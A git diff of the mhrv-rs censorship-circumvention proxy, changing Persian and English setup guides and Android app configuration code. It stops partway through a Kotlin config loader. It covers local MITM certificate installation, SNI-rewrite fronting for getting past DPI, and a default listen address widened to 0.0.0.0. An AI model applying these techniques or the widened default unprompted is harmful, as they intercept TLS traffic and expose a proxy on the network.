 
-### اجرا روی اندروید
+- **Apps Script ID(s)** ← **Deployment ID** از مرحلهٔ ۱ را پیست کن
+- **Auth key** ← همان رشتهٔ تصادفی که در `Code.gs` گذاشتی
+- بقیه را پیش‌فرض ول کن
 
-یک نسخهٔ اندروید هم داریم — همان `mhrv-rs` ولی داخل یک برنامهٔ `Compose` با پل `TUN` از طریق [`tun2proxy`](https://crates.io/crates/tun2proxy). تمام ترافیک دستگاه (مرورگر، تلگرام، هر برنامه‌ای) خودکار از پروکسی رد می‌شود، بدون نیاز به تنظیم per-app.
+روی **Save config** و بعد **Start** بزن. اگر کار کند، دایرهٔ وضعیت سبز می‌شود.
 
-**دانلود:** `mhrv-rs-android-universal-v*.apk` از [صفحهٔ Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) (یک APK جهانی، روی اندروید ۷.۰ و بالاتر، همهٔ معماری‌ها).
+> **تستش کن:** دکمهٔ **Test** را بزن. یک درخواست از طریق رله می‌فرستد و می‌گوید کار کرد یا نه.
 
-**راهنمای کامل فارسی:** [**`docs/android.fa.md`**](docs/android.fa.md) — نصب APK، دیپلوی `Apps Script`، تست `SNI`، نصب گواهی `MITM`، رفع اشکال و محدودیت‌ها.
+### مرحلهٔ ۴ — مرورگر را روی mhrv-rs تنظیم کن
 
-راهنمای انگلیسی هم در [`docs/android.md`](docs/android.md) است.
+#### فایرفاکس (پیشنهادی — ساده‌ترین)
 
-جمع‌بندی سریع:
+1. فایرفاکس → منوی ☰ → **Settings**
+2. در کادر جست‌وجو "proxy" تایپ کن
+3. زیر Network Settings روی **Settings…** کلیک کن
+4. **Manual proxy configuration** را انتخاب کن
+5. **HTTP Proxy:** `127.0.0.1` پورت: `8085`
+6. ☑ **"Also use this proxy for HTTPS"** را تیک بزن
+7. **OK**
 
-۱‏. APK را از `Releases` دانلود و نصب کنید (اگر اندروید «منبع ناشناس» گفت، در همان دیالوگ اجازه بدهید)  
-۲‏. `Apps Script` را طبق [مرحلهٔ ۱ بالا](#مرحلهٔ-۱--ساخت-اسکریپت-در-گوگل-فقط-یک-بار) دیپلوی کنید (همان `Code.gs` + `AUTH_KEY`)  
-۳‏. `/exec URL` و `auth_key` را در برنامه وارد کنید، **Auto-detect google_ip** را بزنید  
-۴‏. **Install MITM certificate** — برنامه گواهی را در `Downloads` ذخیره می‌کند و `Settings` را باز می‌کند. در `Settings` عبارت `CA certificate` را جست‌وجو و از `Downloads` نصب کنید  
-۵‏. **Start** → مجوز `VPN` را تأیید کنید → همه‌چیز کار می‌کند  
+#### کروم / Edge
 
+افزونهٔ [Proxy SwitchyOmega](https://chromewebstore.google.com/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif) را نصب کن و پروکسی را روی `127.0.0.1:8085` تنظیم کن.
 
-محدودیت‌های اندروید همان محدودیت‌های دسکتاپ + دو مورد اضافه: `IPv6` از `TUN` رد نمی‌شود (فقط `IPv4` روت می‌شود) و اکثر برنامه‌های غیر مرورگری (بانکی، `Netflix`، پیام‌رسان‌ها) به `CA` کاربری اعتماد نمی‌کنند. جزئیات در [`docs/android.fa.md`](docs/android.fa.md#محدودیت‌های-شناخته‌شده).
+#### مک (سراسری)
 
-### سوالات رایج
+System Settings → Network → Wi-Fi → Details → **Proxies** → هر دو **Web Proxy (HTTP)** و **Secure Web Proxy (HTTPS)** را روشن کن، هر دو روی `127.0.0.1:8085`.
 
-**چرا باید گواهی نصب کنم؟ امن است؟**
-برنامه برای اینکه بتواند ترافیک `HTTPS` شما را باز کند و از طریق `Apps Script` رد کند، به یک گواهی محلی نیاز دارد. این گواهی **فقط روی سیستم خودتان** ساخته می‌شود و کلید خصوصی هیچ‌وقت جایی ارسال نمی‌شود. هیچ کس — حتی خود گوگل — نمی‌تواند با این گواهی به ترافیک شما دسترسی پیدا کند.
+### مرحلهٔ ۵ — امتحان کن
 
-**چطور گواهی را بعداً حذف کنم؟**
+در مرورگرت یک سایت مسدود را باز کن. باید لود شود.
 
-- **مک:** `Keychain Access` را باز کنید، در بخش `System` دنبال `mhrv-rs` بگردید و حذف کنید. سپس پوشهٔ `~/Library/Application Support/mhrv-rs/ca/` را پاک کنید
-- **ویندوز:** `certmgr.msc` را اجرا کنید → `Trusted Root Certification Authorities` → `Certificates` → دنبال `mhrv-rs` بگردید و حذف کنید
-- **لینوکس:** فایل `/usr/local/share/ca-certificates/mhrv-rs.crt` را حذف و `sudo update-ca-certificates` اجرا کنید
+اگر چیزی کار نکرد:
 
-**چند `Deployment ID` لازم دارم؟**
-یکی برای استفادهٔ عادی کافی است. سهمیهٔ روزانه `UrlFetchApp` برای حساب رایگان گوگل **۲۰٬۰۰۰ درخواست در روز** است (برای `Workspace` پولی ۱۰۰٬۰۰۰)، با محدودیت پاسخ ۵۰ مگابایت به ازای هر `fetch`. از هر حساب گوگل **فقط یک `Deployment`** بسازید — سقف ۳۰ درخواست همزمان به ازای هر حساب است، پس چند `Deployment` روی یک حساب همزمانی اضافه نمی‌کند. برای افزایش همزمانی یا سهمیهٔ روزانه، در حساب‌های گوگل دیگر `Deployment` بسازید — هر حساب سهمیهٔ ۲۰ هزار درخواستی و ۳۰ اجرای همزمان خودش را دارد. همهٔ `ID`ها را در فیلد `Apps Script ID(s)` وارد کنید — برنامه خودکار بینشان می‌چرخد. مرجع: <https://developers.google.com/apps-script/guides/services/quotas>
+- در پنجرهٔ mhrv-rs دکمهٔ **Test** را بزن — می‌گوید کجا گیر کرده
+- پنل **Recent log** پایین پنجره را نگاه کن
+- بخش [سؤالات رایج](#سؤالات-رایج) پایین را ببین
 
-**یوتوب کار می‌کند؟ ویدیو پخش می‌شود؟**
-صفحهٔ یوتوب سریع باز می‌شود (چون مستقیم از لبهٔ گوگل می‌آید). اما `chunk`های ویدیوی اصلی از `googlevideo.com` از طریق `Apps Script` می‌آیند و روزانه سهمیه دارند. برای تماشای گاه‌به‌گاه خوب است، برای ۱۰۸۰p پخش طولانی دردناک.
+---
 
-**‏`ChatGPT` یا `OpenAI` کار می‌کنند؟**
-استریم زنده (`streaming`) آن‌ها کار نمی‌کند چون از `WebSocket` استفاده می‌کنند و `Apps Script` آن را پشتیبانی نمی‌کند. تنها راه‌حل: از `xray` استفاده کنید (بخش **تلگرام و غیره** را ببینید).
+## سؤالات رایج
 
-**خطای `GLIBC_2.39 not found` در لینوکس می‌گیرم. چه کنم؟**
-از نسخهٔ `v0.7.1` به بعد این مشکل حل شده. اما اگر روی سیستم خیلی قدیمی هستید، آرشیو `mhrv-rs-linux-musl-amd64.tar.gz` را دانلود کنید — این نسخه بدون نیاز به `glibc` روی هر لینوکسی اجرا می‌شود.
+**واقعاً رایگانه؟** بله. گوگل به هر حساب روزانه ۲۰٬۰۰۰ درخواست خروجی URL در سهمیهٔ رایگان می‌دهد. برای مرور عادی یک نفر کاملاً کافی است. برای خانوادهٔ ۳-۴ نفره که از یک سرویس استفاده می‌کنند، در ۲-۳ حساب گوگل مختلف Deployment بساز و همهٔ ID‌ها را اضافه کن.
 
-**می‌توانم با `CLI` هم استفاده کنم (بدون رابط گرافیکی)؟**
-بله. فایل `config.example.json` را به `config.json` کپی کنید، مقادیر را پر کنید، و این دستورات را بزنید:
+**امنه؟** گواهی روی کامپیوتر خودت می‌ماند — کسی کلید خصوصی را ندارد. `auth_key` رمز محرمانهٔ توست. گوگل سایت‌هایی که از طریق رله باز می‌کنی را می‌بیند (چون Apps Script برای تو fetch می‌کند) — مثل هر پروکسی میزبانی‌شدهٔ دیگری. اگر این برایت قابل قبول نیست، از Full Tunnel با VPS شخصی استفاده کن — در [راهنمای کامل](docs/guide.fa.md#حالت-تونل-کامل).
 
-```bash
-./mhrv-rs                   # اجرای پروکسی
-./mhrv-rs test              # تست یک درخواست کامل
-./mhrv-rs scan-ips          # رتبه‌بندی IPهای گوگل بر اساس سرعت
-./mhrv-rs test-sni          # تست نام‌های SNI در pool
-./mhrv-rs --install-cert    # نصب مجدد گواهی
-./mhrv-rs --help
-```
+**ویدیوی یوتیوب پخش نمی‌شود.** chunkهای ویدیوی یوتیوب از `googlevideo.com` می‌آیند و Apps Script نمی‌تواند به آن برسد (گوگل اجازهٔ دسترسی Apps Script به CDN ویدیوی خودش را نمی‌دهد). صفحهٔ خود یوتیوب لود می‌شود، فقط پخش ویدیو تحت تأثیر است. راه‌حل: Full Tunnel + VPS، یا `.googlevideo.com` را به `passthrough_hosts` در کانفیگت اضافه کن (مرورگر مستقیم می‌رود اما روی ISP ایران throttle می‌خورد).
 
-**چرا گاهی جست‌وجوی گوگل بدون `JavaScript` نشان داده می‌شود؟**
-`Apps Script` مجبور است `User-Agent` درخواست‌های خود را روی `Google-Apps-Script` بگذارد. بعضی سایت‌ها این را به عنوان ربات شناسایی می‌کنند و نسخهٔ سادهٔ بدون `JavaScript` برمی‌گردانند. دامنه‌هایی که در لیست `SNI-rewrite` قرار گرفته‌اند (مثل `google.com`، `youtube.com`) از این مشکل در امان هستند چون مستقیماً از لبهٔ گوگل می‌آیند، نه از `Apps Script`.
+**ChatGPT / Claude / Grok کپچای Cloudflare نشان می‌دهد.** Cloudflare آی‌پی‌های دیتاسنتر گوگل را به‌عنوان bot شناسایی می‌کند. راه‌حل: یک **exit node** راه‌اندازی کن — یک handler کوچک TypeScript که روی یک host serverless (Deno Deploy، fly.io، VPS شخصی) deploy می‌کنی و پل می‌سازه از Apps Script به سایت Cloudflare. [`assets/exit_node/README.fa.md`](assets/exit_node/README.fa.md).
 
-**ورود به حساب گوگل با این ابزار ایمن است؟**
-توصیه می‌شود اولین بار بدون این پروکسی یا با `VPN` واقعی وارد شوید، چون گوگل ممکن است `IP` `Apps Script` را به‌عنوان «دستگاه ناشناس» ببیند و هشدار بدهد. بعد از ورود اولیه، استفاده بی‌مشکل است.
+**تلگرام پایدار نیست.** تلگرام از MTProto استفاده می‌کند که Apps Script نمی‌فهمد. روی کامپیوترت با [xray](https://github.com/XTLS/Xray-core) جفتش کن — [بخش تلگرام در راهنمای کامل](docs/guide.fa.md#تلگرام-با-xray).
 
-### محدودیت‌های شناخته‌شده
+**ISP خود `script.google.com` را مسدود کرده.** mhrv-rs یک حالت `direct` دارد که فقط از تونل بازنویسی SNI استفاده می‌کند (بدون Apps Script). یک‌بار از این حالت استفاده کن تا به `script.google.com` برسی و اسکریپت را دیپلوی کنی، بعد به حالت apps_script سوئیچ کن. [حالت direct](docs/guide.fa.md#حالت-direct).
 
-این محدودیت‌ها ذاتی روش `Apps Script` هستند، نه باگ این برنامه. نسخهٔ اصلی پایتون هم دقیقاً همین محدودیت‌ها را دارد.
+**جست‌وجوی گوگلم بدون JavaScript ظاهر می‌شود.** `User-Agent` Apps Script ثابت روی `Google-Apps-Script` است (گوگل نمی‌گذارد اسکریپت‌ها عوضش کنند)، پس بعضی سایت‌ها نسخهٔ بدون JS برمی‌گردانند. راه‌حل: دامنهٔ مورد نظر را به `hosts` اضافه کن تا از تونل بازنویسی SNI با User-Agent واقعی مرورگرت برود. `google.com`، `youtube.com`، `fonts.googleapis.com` به‌طور پیش‌فرض در این لیست‌اند.
 
-- ‏`User-Agent` همهٔ درخواست‌ها ثابت روی `Google-Apps-Script` است (گوگل اجازهٔ تغییر نمی‌دهد). بعضی سایت‌ها به‌خاطر این نسخهٔ ساده‌شدهٔ بدون `JavaScript` نشان می‌دهند  
-- پخش ویدیو سهمیه دارد و ممکن است کند باشد (سهمیهٔ `UrlFetchApp` برای حساب رایگان ۲۰٬۰۰۰ درخواست در روز است — چند ساعت یوتیوب برای بیشتر کاربران)  
-- فشرده‌سازی `Brotli` پشتیبانی نمی‌شود (فقط `gzip`)، سربار حجمی جزئی  
-- ‏`WebSocket` از `Apps Script` عبور نمی‌کند (`ChatGPT` استریم، `Discord voice`، …)  
-- سایت‌هایی که گواهی خود را `pin` کرده‌اند گواهی `MITM` برنامه را قبول نمی‌کنند (تعداد کمی‌اند)  
-- ورود دومرحله‌ای گوگل ممکن است هشدار «دستگاه ناشناس» بدهد — اولین ورود را بدون این ابزار انجام دهید  
-### امنیت
+**سؤالات بیشتر:** [FAQ کامل در راهنمای بلند](docs/guide.fa.md#سؤالات-رایج).
 
-- ریشهٔ `MITM` **فقط روی سیستم شما می‌ماند**. کلید خصوصی هیچ‌وقت از سیستمتان خارج نمی‌شود
-- `auth_key` یک رمز اختصاصی بین شما و اسکریپت شماست. کد سرور هر درخواستی را که این رمز را نداشته باشد رد می‌کند
-- ترافیک بین شما و گوگل، `TLS 1.3` استاندارد است
-- آنچه گوگل می‌بیند: آدرس `URL` و هدرهای درخواست شما (چون `Apps Script` به‌جای شما `fetch` می‌کند). این همان سطح اعتماد هر پروکسی میزبانی‌شده است — اگر قابل قبول نیست، از `VPN` روی سرور شخصی خودتان استفاده کنید
-- **هشدار افشای `IP` در حالت `apps_script`:** نسخهٔ ۱.۲.۹ همهٔ هدرهای شناسایی‌کننده (`X-Forwarded-For`، `X-Real-IP`، `Forwarded`، `Via`، `CF-Connecting-IP`، `True-Client-IP`، `Fastly-Client-IP` و ~۱۰ هدر مشابه) را از درخواست خروجی سمت کلاینت قبل از رسیدن به `Apps Script` حذف می‌کند ([#104](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/104)). اما آنچه این پوشش نمی‌دهد: هر هدری که زیرساخت خود گوگل ممکن است به درخواست بعدی `UrlFetchApp.fetch()` از کلاینت اضافه کند، در اختیار این برنامه نیست. سرور مقصد `IP` دیتاسنتر گوگل را می‌بیند، اما هیچ تعهد عمومی از گوگل وجود ندارد که `IP` واقعی کاربر در زنجیرهٔ هدرهای داخلی منتشر نمی‌شود. اگر مدل تهدید شما این است که سرور مقصد تحت هیچ شرایطی نباید `IP` شما را ببیند، **از حالت `full` (تونل کامل) استفاده کنید** (ترافیک از `VPS` شخصی شما خارج می‌شود، فقط `IP` آن `VPS` دیده می‌شود). حالت `apps_script` برای دور زدن `DPI` و دسترسی به سایت‌های فیلترشده کاملاً مناسب است، اما فرض می‌کند «دیده‌شدن توسط گوگل» قابل قبول است. مطرح‌شده در [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148).
+## کمک می‌خواهی؟
 
-### اعتبار
+- در [issueهای باز و بسته](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues?q=is%3Aissue) جست‌وجو کن — احتمالاً مشکلت قبلاً جواب داده شده
+- یک [issue جدید](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/new) باز کن با: کانفیگت (حتماً `auth_key` را پنهان کن!)، دقیقاً چه کاری کردی، دقیقاً چه دیدی در log
 
-پروژهٔ اصلی: <https://github.com/masterking32/MasterHttpRelayVPN> توسط [@masterking32](https://github.com/masterking32). ایده، پروتکل `Apps Script`، و معماری پروکسی همه متعلق به ایشان است. این پورت `Rust` فقط برای ساده‌تر کردن توزیع سمت کلاینت درست شده.
+## اعتبار
 
-### حمایت از پروژه
+پروژهٔ اصلی: **[@masterking32/MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN)**. ایده، پروتکل Apps Script، معماری پروکسی — همه از اوست. این پورت Rust برای ساده‌تر کردن توزیع سمت کلاینت است (یک فایل اجرایی، بدون نصب پایتون).
 
-اگر `mhrv-rs` برای شما مفید بوده و می‌خواهید از ادامهٔ توسعه حمایت کنید:
+بیشتر کد Rust این پورت با کمک [Claude شرکت Anthropic](https://claude.com) نوشته شده، روی هر commit انسانی بازبینی شده.
 
-### [❤️ حمایت در sh1n.org](https://sh1n.org/donate)
+## حمایت از پروژه
 
-کمک‌ها صرف هزینه‌های میزبانی، سرور `CI` اختصاصی، و ادامهٔ نگهداری پروژه می‌شود. ستاره دادن به ریپو هم یک راه رایگان برای نشان دادن اینه که پروژه ارزش ادامه دادن داره.
+[❤️ کمک مالی در sh1n.org](https://sh1n.org/donate) — برای پوشش هزینهٔ هاستینگ و runner CI. ستاره دادن به ریپو هم نشان می‌دهد پروژه ارزش ادامه دادن دارد.
 
 </div>
diff --git a/SF_README.md b/SF_README.md
index 2648c790..a172fd8e 100644
--- a/SF_README.md
+++ b/SF_README.md
@@ -23,7 +23,7 @@ A free way to bypass internet censorship by routing your traffic through your ow
 **1. Set up the relay in your Google account (one-time).**
 Go to <https://script.google.com>, sign in, click **New project**. Delete the sample code, paste in the [Code.gs file from this repo](assets/apps_script/Code.gs), change `AUTH_KEY = "..."` to a password only you know. Click **Deploy → New deployment → Web app**, set "Execute as: Me", "Who has access: Anyone". Copy the long ID from the URL — that's your **Deployment ID**.
 
-> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `google_only` mode (use [`config.google-only.example.json`](config.google-only.example.json)). It only relays Google sites and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode.
+> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `direct` mode (use [`config.direct.example.json`](config.direct.example.json)). It only relays Google sites (plus any [fronting_groups](docs/fronting-groups.md) you've configured) and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode. (`direct` was named `google_only` before v1.9 — the old name still works.)
 
 **2. Install and run mhrv-rs.**
 Download the package for your system from [Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) and unzip it.
@@ -94,7 +94,7 @@ This project is free and run by volunteers. If it helped you and you can spare a
 **۱. ساخت ریله در حساب گوگل (فقط یک بار).**
 به <https://script.google.com> بروید، وارد حساب گوگل شوید و روی **New project** بزنید. کد پیش‌فرض را پاک کنید و محتوای [فایل Code.gs](assets/apps_script/Code.gs) همین مخزن را در آن جای‌گذاری کنید. خط `AUTH_KEY = "..."` را به یک رمز دلخواه که فقط خودتان می‌دانید تغییر دهید. سپس **Deploy → New deployment → Web app** را بزنید، گزینهٔ "Execute as: Me" و "Who has access: Anyone" را انتخاب کنید. آی‌دی طولانی توی URL را کپی کنید — این **Deployment ID** شماست.
 
-> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `google_only` اجرا کنید (از [`config.google-only.example.json`](config.google-only.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید.
+> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `direct` اجرا کنید (از [`config.direct.example.json`](config.direct.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل (به علاوهٔ هر [fronting_groups](docs/fronting-groups.md) که تنظیم کرده باشید) را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید. (نام قبلی این حالت `google_only` بود — همچنان پذیرفته می‌شود.)
 
 **۲. نصب و اجرای mhrv-rs.**
 بستهٔ مخصوص سیستم خودتان را از [بخش Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) دانلود کنید و از حالت فشرده در بیاورید.
diff --git a/android/app/build.gradle.kts b/android/app/build.gradle.kts
index 29671b31..e7fc15ae 100644
--- a/android/app/build.gradle.kts
+++ b/android/app/build.gradle.kts
@@ -14,8 +14,8 @@ android {
         applicationId = "com.therealaleph.mhrv"
         minSdk = 24 // Android 7.0 — covers 99%+ of live devices.
         targetSdk = 34
-        versionCode = 139
-        versionName = "1.6.0"
+        versionCode = 159
+        versionName = "1.9.25"
 
         // Ship all four mainstream Android ABIs:
         //   - arm64-v8a      — 95%+ of real-world Android phones since 2019
@@ -136,6 +136,10 @@ dependencies {
     implementation("androidx.compose.material3:material3")
     implementation("androidx.compose.material:material-icons-extended")
 
+    // QR code generation + scanning (self-contained, no ML Kit needed).
+    implementation("com.google.zxing:core:3.5.3")
+    implementation("com.journeyapps:zxing-android-embedded:4.3.0")
+
     debugImplementation("androidx.compose.ui:ui-tooling")
     debugImplementation("androidx.compose.ui:ui-test-manifest")
 }
diff --git a/android/app/src/main/AndroidManifest.xml b/android/app/src/main/AndroidManifest.xml
index dd2e94e8..cce8e611 100644
--- a/android/app/src/main/AndroidManifest.xml
+++ b/android/app/src/main/AndroidManifest.xml
@@ -17,6 +17,7 @@
       prompt.
     -->
     <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" />
+    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
 
     <!--
       App-launcher visibility filter. Complements QUERY_ALL_PACKAGES:
@@ -53,8 +54,33 @@
                 <action android:name="android.intent.action.MAIN" />
                 <category android:name="android.intent.category.LAUNCHER" />
             </intent-filter>
+            <!-- Deep link: tapping mhrv-rs://... in any app opens MainActivity
+                 and offers the encoded config for import (user confirms first). -->
+            <intent-filter>
+                <action android:name="android.intent.action.VIEW" />
+                <category android:name="android.intent.category.DEFAULT" />
+                <category android:name="android.intent.category.BROWSABLE" />
+                <data android:scheme="mhrv-rs" />
+            </intent-filter>
         </activity>
 
+        <!-- FileProvider for sharing QR code images via the share sheet. -->
+        <provider
+            android:name="androidx.core.content.FileProvider"
+            android:authorities="${applicationId}.fileprovider"
+            android:exported="false"
+            android:grantUriPermissions="true">
+            <meta-data
+                android:name="android.support.FILE_PROVIDER_PATHS"
+                android:resource="@xml/file_paths" />
+        </provider>
+
+        <!-- Force ZXing scanner to portrait (matches app orientation). -->
+        <activity
+            android:name="com.journeyapps.barcodescanner.CaptureActivity"
+            android:screenOrientation="portrait"
+            tools:replace="android:screenOrientation" />
+
         <!--
           VpnService: Android captures all traffic at the IP layer and feeds
           it to us via a TUN file descriptor. The android.net.VpnService action
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt b/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt
index 25625ded..d00d59e4 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt
@@ -64,19 +64,23 @@ enum class UiLang { AUTO, FA, EN }
  *
  * - [APPS_SCRIPT] (default) — full DPI bypass through the user's deployed
  *   Apps Script relay. Requires a Deployment ID + Auth key.
- * - [GOOGLE_ONLY] — bootstrap mode. Only the SNI-rewrite tunnel to the
- *   Google edge is active, so the user can reach `script.google.com` to
- *   deploy Code.gs in the first place. No Deployment ID / Auth key needed.
- *   Non-Google traffic goes direct (no relay).
+ * - [DIRECT] — no Apps Script relay. Only the SNI-rewrite tunnel is
+ *   active: Google edge by default, plus any user-configured
+ *   `fronting_groups` (Vercel, Fastly, …). Useful as a bootstrap to
+ *   reach `script.google.com` and deploy Code.gs, or as a standalone
+ *   mode for users who only need fronting-group targets. No Deployment
+ *   ID / Auth key needed. Non-matching traffic goes raw (no relay).
+ *   Was named `GOOGLE_ONLY` before fronting_groups was added — the
+ *   string `"google_only"` is still accepted on parse for back-compat.
  * - [FULL] — full tunnel mode. ALL traffic is tunneled end-to-end through
  *   Apps Script + a remote tunnel node. No certificate installation needed.
  */
-enum class Mode { APPS_SCRIPT, GOOGLE_ONLY, FULL }
+enum class Mode { APPS_SCRIPT, DIRECT, FULL }
 
 data class MhrvConfig(
     val mode: Mode = Mode.APPS_SCRIPT,
 
-    val listenHost: String = "127.0.0.1",
+    val listenHost: String = "0.0.0.0",
     val listenPort: Int = 8080,
     val socks5Port: Int? = 1081,
 
@@ -92,6 +96,20 @@ data class MhrvConfig(
     val verifySsl: Boolean = true,
     val logLevel: String = "info",
     val parallelRelay: Int = 1,
+    /**
+     * Disable the HTTP/2 multiplexing on the Apps Script relay leg.
+     * Default false (h2 active); flip to true to force the legacy
+     * HTTP/1.1 keep-alive pool. Round-tripped from config.json so a
+     * hand-edited kill switch survives a save round trip from the
+     * Android UI. See `src/config.rs` `force_http1`.
+     */
+    val forceHttp1: Boolean = false,
+    val coalesceStepMs: Int = 10,
+    val coalesceMaxMs: Int = 1000,
+    /** Block QUIC (UDP/443). QUIC over TCP tunnel causes meltdown. */
+    val blockQuic: Boolean = true,
+    /** Block STUN/TURN ports (3478/5349/19302). Forces WebRTC TCP fallback. */
+    val blockStun: Boolean = true,
     val upstreamSocks5: String = "",
 
     /**
@@ -104,6 +122,30 @@ data class MhrvConfig(
      */
     val passthroughHosts: List<String> = emptyList(),
 
+    /**
+     * Opt-out for the DoH bypass. The Rust default is to bypass DoH
+     * traffic (chrome.cloudflare-dns.com, dns.google, etc.) directly
+     * instead of routing it through the Apps Script tunnel — DoH
+     * already encrypts queries, so the tunnel was just adding ~2 s
+     * per name lookup with no real privacy gain. Set this to true to
+     * keep DoH inside the tunnel (note: this Android default is `true`). See `src/config.rs` `tunnel_doh`.
+     */
+    val tunnelDoh: Boolean = true,
+
+    /**
+     * Extra hostnames added to the built-in DoH default list. Same
+     * matching shape as `passthroughHosts` (exact or leading-dot
+     * suffix). Use to cover private / enterprise DoH endpoints.
+     */
+    val bypassDohHosts: List<String> = emptyList(),
+
+    /**
+     * When true, reject all connections to known DoH endpoints.
+     * Browsers fall back to system DNS (tun2proxy virtual DNS — instant).
+     * Takes priority over tunnel_doh / bypass_doh_hosts.
+     */
+    val blockDoh: Boolean = true,
+
     /** VPN_TUN (everything routed) vs PROXY_ONLY (user configures per-app). */
     val connectionMode: ConnectionMode = ConnectionMode.VPN_TUN,
 
@@ -112,6 +154,13 @@ data class MhrvConfig(
     /** Package names used by ONLY and EXCEPT. Empty under ALL. */
     val splitApps: List<String> = emptyList(),
 
+    /**
+     * Route YouTube traffic through Apps Script relay instead of the
+     * SNI-rewrite tunnel. Avoids Google SafeSearch-on-SNI / restricted
+     * mode, but slower for video. Maps to Rust `youtube_via_relay`.
+     */
+    val youtubeViaRelay: Boolean = false,
+
     /** UI language toggle. Non-Rust; honoured only by the Android wrapper. */
     val uiLang: UiLang = UiLang.AUTO,
 ) {
@@ -158,14 +207,14 @@ data class MhrvConfig(
             // "missing field `mode`" and startProxy silently returns 0.
             put("mode", when (mode) {
                 Mode.APPS_SCRIPT -> "apps_script"
-                Mode.GOOGLE_ONLY -> "google_only"
+                Mode.DIRECT -> "direct"
                 Mode.FULL -> "full"
             })
             put("listen_host", listenHost)
             put("listen_port", listenPort)
             socks5Port?.let { put("socks5_port", it) }
 
-            // In google_only mode these are unused by the Rust side, but we
+            // In direct mode these are unused by the Rust side, but we
             // still persist whatever the user typed so flipping back to
             // apps_script mode doesn't wipe their settings.
             put("script_ids", JSONArray().apply { ids.forEach { put(it) } })
@@ -180,12 +229,31 @@ data class MhrvConfig(
             put("verify_ssl", verifySsl)
             put("log_level", logLevel)
             put("parallel_relay", parallelRelay)
+            if (forceHttp1) put("force_http1", true)
+            if (coalesceStepMs != 10) put("coalesce_step_ms", coalesceStepMs)
+            if (coalesceMaxMs != 1000) put("coalesce_max_ms", coalesceMaxMs)
+            put("block_quic", blockQuic)
+            put("block_stun", blockStun)
             if (upstreamSocks5.isNotBlank()) {
                 put("upstream_socks5", upstreamSocks5.trim())
             }
             if (passthroughHosts.isNotEmpty()) {
                 put("passthrough_hosts", JSONArray().apply { passthroughHosts.forEach { put(it) } })
             }
+            put("tunnel_doh", tunnelDoh)
+            put("block_doh", blockDoh)
+            if (youtubeViaRelay) put("youtube_via_relay", true)
+            // Trim/drop-empty/dedupe before serializing — symmetric with the
+            // read-side normalization in loadFromJson(), so a user typing
+            // " doh.foo " or accidentally adding a duplicate doesn't end up
+            // in the saved JSON.
+            val cleanBypassDohHosts = bypassDohHosts
+                .map { it.trim() }
+                .filter { it.isNotEmpty() }
+                .distinct()
+            if (cleanBypassDohHosts.isNotEmpty()) {
+                put("bypass_doh_hosts", JSONArray().apply { cleanBypassDohHosts.forEach { put(it) } })
+            }
 
             // Phone-scoped scan defaults. We don't expose these in the UI
             // because a phone isn't where you'd run a full /16 scan; users
@@ -230,59 +298,7 @@ object ConfigStore {
         val f = File(ctx.filesDir, FILE)
         if (!f.exists()) return MhrvConfig()
         return try {
-            val obj = JSONObject(f.readText())
-
-            val ids = obj.optJSONArray("script_ids")?.let { arr ->
-                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-            }?.filter { it.isNotBlank() }.orEmpty()
-            // For display we turn each ID back into the full URL form —
-            // easier to paste-verify, and the Kotlin side doesn't depend
-            // on it (extractId re-parses on save).
-            val urls = ids.map { "https://script.google.com/macros/s/$it/exec" }
-
-            val sni = obj.optJSONArray("sni_hosts")?.let { arr ->
-                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-            }?.filter { it.isNotBlank() }.orEmpty()
-
-            MhrvConfig(
-                mode = when (obj.optString("mode", "apps_script")) {
-                    "google_only" -> Mode.GOOGLE_ONLY
-                    "full" -> Mode.FULL
-                    else -> Mode.APPS_SCRIPT
-                },
-                listenHost = obj.optString("listen_host", "127.0.0.1"),
-                listenPort = obj.optInt("listen_port", 8080),
-                socks5Port = obj.optInt("socks5_port", 1081).takeIf { it > 0 },
-                appsScriptUrls = urls,
-                authKey = obj.optString("auth_key", ""),
-                frontDomain = obj.optString("front_domain", "www.google.com"),
-                sniHosts = sni,
-                googleIp = obj.optString("google_ip", "142.251.36.68"),
-                verifySsl = obj.optBoolean("verify_ssl", true),
-                logLevel = obj.optString("log_level", "info"),
-                parallelRelay = obj.optInt("parallel_relay", 1),
-                upstreamSocks5 = obj.optString("upstream_socks5", ""),
-                passthroughHosts = obj.optJSONArray("passthrough_hosts")?.let { arr ->
-                    buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-                }?.filter { it.isNotBlank() }.orEmpty(),
-                connectionMode = when (obj.optString("connection_mode", "vpn_tun")) {
-                    "proxy_only" -> ConnectionMode.PROXY_ONLY
-                    else -> ConnectionMode.VPN_TUN  // default for unknown/missing
-                },
-                splitMode = when (obj.optString("split_mode", "all")) {
-                    "only" -> SplitMode.ONLY
-                    "except" -> SplitMode.EXCEPT
